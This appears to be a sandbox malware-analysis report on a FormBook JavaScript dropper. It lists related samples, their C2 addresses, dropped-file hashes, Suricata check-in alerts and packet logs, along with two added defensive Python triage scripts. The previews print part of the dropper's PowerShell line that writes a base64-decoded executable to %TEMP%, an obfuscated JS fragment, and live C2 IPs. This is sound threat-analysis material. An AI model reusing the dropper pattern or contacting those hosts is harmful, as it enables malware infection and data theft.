  PO from tpc Type 34.1 34,2 35 Spec 1.js | malicious | FormBook | 104.21.112.1
  2024-02-17.js | malicious | FormBook | 172.67.207.50
  useeeerrrrr.js | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
  PO.exe | malicious | FormBook | 104.21.64.1
  15300429772_20250121_09114163_HesapOzeti.exe | malicious | Snake Keylogger | 104.21.80.1
  Quotation.xls | malicious | Unknown | 104.21.96.1
  Purchase Order.xla.xlsx | malicious | Unknown | 188.114.96.3
NAMECHEAP-NETUS
  PO.exe | malicious | FormBook | 198.187.31.216
  ORD_VIO-002-2025e-O001.exe | malicious | FormBook | 63.250.38.223
  QUOTE OF DRY DOCK REPAIR.exe | malicious | FormBook | 192.64.118.221
  PO# 81136575.exe | malicious | FormBook | 162.0.231.203
  QUOTATION NO REQ-19-000640.exe | malicious | FormBook | 162.0.231.203
  SHIPMENT OF THE ORIGINAL DOCUMENTS.exe | malicious | FormBook | 162.0.231.203
  play.wav.htm | malicious | HtmlDropper | 162.0.229.203
  SWIFT COPY.js | malicious | FormBook | 162.0.231.203
  SCAN RC INV 92_0225 SHEETS.exe | malicious | FormBook | 162.0.231.203
  kzTq7Bt.exe | malicious | Unknown | 198.54.120.127
AMAZON-02US
  2024-02-17.js | malicious | FormBook | 13.248.169.48
  PO.exe | malicious | FormBook | 13.248.169.48
  ORD_VIO-002-2025e-O001.exe | malicious | FormBook | 13.248.169.48
  file.lnk | malicious | Unknown | 52.222.236.19
  file.lnk | malicious | Unknown | 52.222.236.76
  Hilix.sh4.elf | malicious | Unknown | 54.112.132.3
  Xw9oZv75Ze.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 18.244.18.122
  Hilix.arm5.elf | malicious | Unknown | 54.171.230.55
  Hilix.arm7.elf | malicious | Mirai | 54.245.42.226
  res.mips.elf | malicious | Unknown | 3.186.179.89
BODIS-NJUS
  2024-02-17.js | malicious | FormBook | 199.59.243.160
  PO.exe | malicious | FormBook | 199.59.243.228
  UPDATED SOA.pdf.exe | malicious | FormBook | 199.59.243.228
  PO# 81136575.exe | malicious | FormBook | 199.59.243.228
  QUOTATION NO REQ-19-000640.exe | malicious | FormBook | 199.59.243.228
  SHIPMENT OF THE ORIGINAL DOCUMENTS.exe | malicious | FormBook | 199.59.243.228
  SWIFT COPY.js | malicious | FormBook | 199.59.243.160
  Order inquiry.pif.exe | malicious | FormBook | 199.59.243.228
  http://ndax--sso--auth-io.webflow.io/ | malicious | HTMLPhisher | 199.59.243.227
  2025-02-14.js | malicious | FormBook | 199.59.243.228
                                                                        No context
                                                                        No context
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):551032
                                                                        Entropy (8bit):5.9774318682873515
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7ghV31GpYb4GEaIwtZVG1KwZfyuOqI+jXu65tk40B7DfaP8n3KO8Lc0:7ghV3nbGwzE1KwxE0CDnj6W0
                                                                        MD5:6A6E89ED295636FFFE48E8BA04095DF9
                                                                        SHA1:BE0CAC2911DB15806D12E78B80348A9AFC8E5819
                                                                        SHA-256:1C5AD5AC70F96CEAE6FC8A6D8762A0C9D61581D0EF5765D4B2BAC04463A5C736
                                                                        SHA-512:B1A1B448741DBC0A1A1367F9F8B92B7C5A5FFCBE45513EA7CAB09EB0495D896C93CB8500F3260CF57257F2985B88A0905B89344ECD011B7DC81CCE8D75FC61BD
                                                                        Malicious:true
                                                                        Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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
                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):226
                                                                        Entropy (8bit):5.360398796477698
                                                                        Encrypted:false
                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                        MD5:3A8957C6382192B71471BD14359D0B12
                                                                        SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                        SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                        SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):551032
                                                                        Entropy (8bit):5.9774318682873515
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7ghV31GpYb4GEaIwtZVG1KwZfyuOqI+jXu65tk40B7DfaP8n3KO8Lc0:7ghV3nbGwzE1KwxE0CDnj6W0
                                                                        MD5:6A6E89ED295636FFFE48E8BA04095DF9
                                                                        SHA1:BE0CAC2911DB15806D12E78B80348A9AFC8E5819
                                                                        SHA-256:1C5AD5AC70F96CEAE6FC8A6D8762A0C9D61581D0EF5765D4B2BAC04463A5C736
                                                                        SHA-512:B1A1B448741DBC0A1A1367F9F8B92B7C5A5FFCBE45513EA7CAB09EB0495D896C93CB8500F3260CF57257F2985B88A0905B89344ECD011B7DC81CCE8D75FC61BD
                                                                        Malicious:false
                                                                        Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                        MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                        SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                        SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                        SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                        Malicious:false
                                                                        Preview:@...e.................................R..............@..........
                                                                        Process:C:\Windows\SysWOW64\MRINFO.EXE
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):413184
                                                                        Entropy (8bit):7.9357372035738
                                                                        Encrypted:false
                                                                        SSDEEP:12288:93EXwT/ZGtI7TVDQXBlNlUKDYC5X00vo82:dviMTVMXBlNmKE+XJQ8
                                                                        MD5:FEC299680E47D0901C60D84DD11EFC55
                                                                        SHA1:01663B35860B6E845F6D2A36A607F97D7F6AA185
                                                                        SHA-256:506D591BE3AE904CD52B172BE69B3CC51C570AF62B35B23666430DC965A5A118
                                                                        SHA-512:12B180C984DD2855A3D036A7E525D0CA1DF207FF6A518D3127B9BFC26B5EF60705197B45D7D0079C727ED8B1550DA5980A37C906B52248A45BED099A74D174F6
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..D...J.......c... ........@.. ....................................`.................................pc..W.................................................................................... ............... ..H............text....C... ...D.................. ..`.reloc...............F..............@..B.rsrc................H..............@..@.................c......H.......8...8i...........H..$...........................................".(.....*....0...........(.....*.0..O.......s%.....(....%&}......}......}......}......(*...}.....|......(...+.|....(u...%&*..0..E.........(1...%&(/.....B(1...%&(/...%&..[(1...%&....(....%&(J...%&...(.....*....0............(/...%&....($....+..*..0............(*....8f.....(......(....%&.(*.........,'.E.........-......& ....(1...%&(....%&z...(*...(d...%&.....(*...X(d...%&.(....%&...(*..........{.......(*....
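The dropped-files listing above shows the two halves of the second stage: a 551,032-byte text file written by wscript.exe whose preview begins with `$p=[IO.Path]::Combine($env:TEMP,"x.exe")` followed by `[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("...` (the blob itself is not shown), and a 413,184-byte .NET PE that powershell.exe then writes as x.exe. The script below is an added triage example, not part of the Joe Sandbox report: it pulls the base64 argument out of such a stage, decodes it, checks for the MZ magic, hashes the result, compares it with the hashes the report lists for x.exe, and checks that the text size is consistent with the PE size (base64 of 413,184 bytes is exactly 550,912 characters, leaving 120 bytes for the PowerShell wrapper in the preview). Because the real blob is not on the page, the stage text used here is constructed around a tiny fake "MZ" payload; the report's hashes and sizes are the only real values in it.

```python
"""Offline triage of a PowerShell base64 dropper stage (added example, not
report code). Sample stage text below is CONSTRUCTED; the REPORT_* values are
copied from the Joe Sandbox dropped-files listing."""
import base64
import hashlib
import math
import re

# x.exe as listed in the report (size in bytes, hashes lower-case hex).
REPORT_X_EXE = {
    "size": 413184,
    "md5": "fec299680e47d0901c60d84dd11efc55",
    "sha256": "506d591be3ae904cd52b172be69b3cc51c570af62b35b23666430dc965a5a118",
}
# Size of the PowerShell text file the report says wscript.exe dropped.
REPORT_DROPPER_TEXT_SIZE = 551032

# First FromBase64String("...") literal; base64 may be wrapped across lines.
_B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=\s]*)"\s*\)')


def extract_base64_arg(stage_text: str) -> str:
    """Return the base64 literal passed to FromBase64String, or raise."""
    m = _B64_ARG.search(stage_text)
    if not m:
        raise ValueError("no FromBase64String(...) literal found")
    return m.group(1)


def hash_bytes(data: bytes) -> dict:
    """MD5 and SHA-256 in the same hex form the report uses."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def base64_length_for(decoded_size: int) -> int:
    """Padded, unwrapped base64 length: 4 characters per 3 input bytes."""
    return 4 * math.ceil(decoded_size / 3)


def size_consistent(text_size: int, pe_size: int, max_wrapper: int = 512) -> bool:
    """True if the text is the base64 of a pe_size-byte file plus a short wrapper."""
    wrapper = text_size - base64_length_for(pe_size)
    return 0 <= wrapper <= max_wrapper


def triage_dropper(stage_text: str) -> dict:
    """Decode the embedded payload and describe it."""
    blob = extract_base64_arg(stage_text)
    # b64decode ignores whitespace, as [Convert]::FromBase64String does.
    payload = base64.b64decode(blob)
    info = {
        "size": len(payload),
        "is_pe": payload[:2] == b"MZ",
        # The visible stage writes into %TEMP%; flag that too.
        "writes_to_temp": "Combine($env:TEMP" in stage_text,
    }
    info.update(hash_bytes(payload))
    return info


def matches_report(info: dict, expected: dict) -> dict:
    """Per-field comparison of a triage result with the report's values."""
    return {k: info.get(k) == v for k, v in expected.items()}


# CONSTRUCTED stand-in payload: MZ magic plus filler, not a real executable.
FAKE_PE = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 28  # 96 bytes
# CONSTRUCTED stage text mirroring the two statements visible in the preview.
SAMPLE_STAGE = (
    '$p=[IO.Path]::Combine($env:TEMP,"x.exe")\r\n'
    '[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("'
    + base64.b64encode(FAKE_PE).decode("ascii")
    + '"))\r\n'
)

if __name__ == "__main__":
    result = triage_dropper(SAMPLE_STAGE)
    print(result)
    print("matches report:", matches_report(result, REPORT_X_EXE))
    print("report sizes consistent:",
          size_consistent(REPORT_DROPPER_TEXT_SIZE, REPORT_X_EXE["size"]))
```

Run against the real dropped text file, `triage_dropper` should report `is_pe` true, size 413184 and the MD5/SHA-256 above; a mismatch means the stage decodes to something other than the PE the sandbox saw written, which is worth a second look before the hashes are used as indicators.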
                                                                        File type:ASCII text, with very long lines (6696), with no line terminators
                                                                        Entropy (8bit):5.578028086864442
                                                                        TrID:
                                                                        • Java Script (8504/1) 100.00%
                                                                        File name:payment1.js
                                                                        File size:6'696 bytes
                                                                        MD5:2654bc864c7151909126b25ea1c81b76
                                                                        SHA1:5ed041b8271952bdeb234412d57b08d62a2d76d5
                                                                        SHA256:c7416d2226ba27764dc40ad2b8288e051f7f40f116f5995388a3a88e55c4006f
                                                                        SHA512:0a3147b19d8ed6e2260be0d15385e98cb717ef34ac4157b5752c0328b8ce8eac81b806daa86af8039411634d3375266b29f033752a6101ef7b4a06256f6b3042
                                                                        SSDEEP:192:WOXm/Oy5y8BbUYBCO+dmHwYLBCTdCmRtUcDjOGEkCzvo:kOX8lUYBCOhwKMdDF1CA
                                                                        TLSH:F2D162443BD4A08537D75F67772B20D4F99D9C87AAE58C4FE854EC40EE805A0DED1938
                                                                        File Content Preview:var _0x36bb1e=_0x5598,_0x165511=_0x2aa5,_0x429836=_0xe32f;function _0x3d8f(){var _0x1bc8c2=['MSXML2.XMLHTTP','371190cReolU','rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU','q3jLyxrLt2jQzwn0','bab4W6tdK8oJrG','W4iJW43dGGa8W5i7W40iWOVcRq4','message',
                                                                        Icon Hash:68d69b8bb6aa9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-18T08:14:24.465469+0100 | 2018856 | ET MALWARE Windows executable base64 encoded | 1 | 196.251.92.64 | 80 | 192.168.2.4 | 49731 | TCP
2025-02-18T08:15:08.251077+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 52381 | 104.21.16.1 | 80 | TCP
2025-02-18T08:15:23.924194+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52479 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:26.471184+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52495 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:29.004663+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52511 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:31.565835+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 52532 | 199.59.243.160 | 80 | TCP
2025-02-18T08:15:37.053621+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52568 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:39.727711+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52584 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:42.257629+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52600 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:44.793153+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 52619 | 13.248.169.48 | 80 | TCP
2025-02-18T08:15:50.453083+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52656 | 162.0.231.203 | 80 | TCP
2025-02-18T08:15:52.974967+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52657 | 162.0.231.203 | 80 | TCP
2025-02-18T08:15:55.550608+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52658 | 162.0.231.203 | 80 | TCP
2025-02-18T08:15:58.061120+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 52659 | 162.0.231.203 | 80 | TCP
2025-02-18T08:16:03.677240+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52660 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:06.212902+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52661 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:08.776489+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52662 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:14.361639+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 52663 | 13.248.169.48 | 80 | TCP
2025-02-18T08:16:20.933176+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52664 | 47.83.1.90 | 80 | TCP
2025-02-18T08:16:24.058104+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52665 | 47.83.1.90 | 80 | TCP
2025-02-18T08:16:26.604887+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 52666 | 47.83.1.90 | 80 | TCP
2025-02-18T08:16:29.221357+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 52667 | 47.83.1.90 | 80 | TCP
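Added example, not part of the Joe Sandbox report: the alert rows above, re-rendered as Suricata fast.log lines and summarised per C2 host. The fast.log text is constructed here from the table (the rule revision `:0` and the classification string are placeholders, not values from the report; the sandbox client 192.168.2.4 is taken from the table). Grouping consecutive FormBook check-in alerts by destination makes the cadence in the table explicit: three POST check-ins followed by one GET per host, about 2.5 s apart, cycling through five C2 hosts, preceded by the stage-2 executable download from 196.251.92.64 (SID 2018856).

```python
"""Summarise Suricata fast.log alerts into FormBook C2 check-in cycles."""
import re
from collections import namedtuple
from datetime import datetime
from statistics import mean

# Suricata fast.log line layout (one alert per line).
FAST_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\].*?\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)"
)
Alert = namedtuple("Alert", "ts sid msg src sport dst dport")

POST = "ETPRO MALWARE FormBook CnC Checkin (POST) M3"
GET = "ET MALWARE FormBook CnC Checkin (GET) M5"
# Constructed from the report's alert table: (time, SID, signature, src, dst).
ROWS = [
    ("08:14:24.465469", 2018856, "ET MALWARE Windows executable base64 encoded", "196.251.92.64:80", "192.168.2.4:49731"),
    ("08:15:08.251077", 2050745, GET, "192.168.2.4:52381", "104.21.16.1:80"),
    ("08:15:23.924194", 2855464, POST, "192.168.2.4:52479", "199.59.243.160:80"),
    ("08:15:26.471184", 2855464, POST, "192.168.2.4:52495", "199.59.243.160:80"),
    ("08:15:29.004663", 2855464, POST, "192.168.2.4:52511", "199.59.243.160:80"),
    ("08:15:31.565835", 2050745, GET, "192.168.2.4:52532", "199.59.243.160:80"),
    ("08:15:37.053621", 2855464, POST, "192.168.2.4:52568", "13.248.169.48:80"),
    ("08:15:39.727711", 2855464, POST, "192.168.2.4:52584", "13.248.169.48:80"),
    ("08:15:42.257629", 2855464, POST, "192.168.2.4:52600", "13.248.169.48:80"),
    ("08:15:44.793153", 2050745, GET, "192.168.2.4:52619", "13.248.169.48:80"),
    ("08:15:50.453083", 2855464, POST, "192.168.2.4:52656", "162.0.231.203:80"),
    ("08:15:52.974967", 2855464, POST, "192.168.2.4:52657", "162.0.231.203:80"),
    ("08:15:55.550608", 2855464, POST, "192.168.2.4:52658", "162.0.231.203:80"),
    ("08:15:58.061120", 2050745, GET, "192.168.2.4:52659", "162.0.231.203:80"),
    ("08:16:03.677240", 2855464, POST, "192.168.2.4:52660", "13.248.169.48:80"),
    ("08:16:06.212902", 2855464, POST, "192.168.2.4:52661", "13.248.169.48:80"),
    ("08:16:08.776489", 2855464, POST, "192.168.2.4:52662", "13.248.169.48:80"),
    ("08:16:14.361639", 2050745, GET, "192.168.2.4:52663", "13.248.169.48:80"),
    ("08:16:20.933176", 2855464, POST, "192.168.2.4:52664", "47.83.1.90:80"),
    ("08:16:24.058104", 2855464, POST, "192.168.2.4:52665", "47.83.1.90:80"),
    ("08:16:26.604887", 2855464, POST, "192.168.2.4:52666", "47.83.1.90:80"),
    ("08:16:29.221357", 2050745, GET, "192.168.2.4:52667", "47.83.1.90:80"),
]


def render_fast_log(rows=ROWS):
    """Render rows as fast.log lines; rev ':0' and the classtype text are placeholders."""
    return [
        f"02/18/2025-{t}  [**] [1:{sid}:0] {msg} [**] "
        f"[Classification: A Network Trojan was detected] [Priority: 1] {{TCP}} {src} -> {dst}"
        for t, sid, msg, src, dst in rows
    ]


def parse_fast_log(lines):
    """Parse fast.log lines into Alert records, skipping lines that do not match."""
    alerts = []
    for line in lines:
        m = FAST_RE.match(line)
        if not m:
            continue
        alerts.append(Alert(datetime.strptime(m["ts"], "%m/%d/%Y-%H:%M:%S.%f"), int(m["sid"]),
                            m["msg"], m["src"], int(m["sport"]), m["dst"], int(m["dport"])))
    return alerts


def beacon_cycles(alerts, client="192.168.2.4"):
    """Group consecutive FormBook check-in alerts from `client` by C2 host.

    Each cycle records the method sequence ('P' = POST, 'G' = GET) and the
    mean spacing between alerts; a host with a lone alert gets mean_gap_s None.
    """
    cycles = []
    for a in alerts:
        if "FormBook CnC Checkin" not in a.msg or a.src != client:
            continue
        method = "G" if "(GET)" in a.msg else "P"
        if cycles and cycles[-1]["host"] == a.dst:
            cycles[-1]["pattern"] += method
            cycles[-1]["times"].append(a.ts)
        else:
            cycles.append({"host": a.dst, "pattern": method, "times": [a.ts]})
    for c in cycles:
        gaps = [(t1 - t0).total_seconds() for t0, t1 in zip(c["times"], c["times"][1:])]
        c["mean_gap_s"] = mean(gaps) if gaps else None
    return cycles


def stage2_downloads(alerts):
    """(server, port) pairs that delivered a base64-encoded Windows executable (SID 2018856)."""
    return sorted({(a.src, a.sport) for a in alerts if a.sid == 2018856})


if __name__ == "__main__":
    alerts = parse_fast_log(render_fast_log())
    print("stage-2 payload served by:", stage2_downloads(alerts))
    for c in beacon_cycles(alerts):
        gap = f"{c['mean_gap_s']:.1f}s" if c["mean_gap_s"] else "-"
        print(f"{c['host']:<16} {c['pattern']:<5} mean gap {gap}")
```

On a live sensor, feed `parse_fast_log` the lines of `fast.log` instead of the rendered rows. The grouping deliberately does not assume every host shows the full pattern: the single GET to 104.21.16.1 in the table comes out as its own one-alert cycle, and 13.248.169.48 appears twice because the sample returns to it after 162.0.231.203.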
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 18, 2025 08:14:23.378732920 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:23.383565903 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:23.383661985 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:23.383867979 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:23.388693094 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.092175007 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.092207909 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.092230082 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.092236042 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.092237949 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.092247009 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.092282057 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.218756914 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.218781948 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.218811989 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.218830109 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.218832970 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.218847990 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.218857050 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.218868017 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.218930960 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.219089985 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.219130993 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.219146967 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.219183922 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.219434023 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.219484091 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.219486952 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.219505072 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.219523907 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.219540119 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.345206976 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345220089 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345232964 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345313072 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
Feb 18, 2025 08:14:24.345324039 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345366001 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345371962 CET | 80 | 49731 | 196.251.92.64 | 192.168.2.4
Feb 18, 2025 08:14:24.345391035 CET | 49731 | 80 | 192.168.2.4 | 196.251.92.64
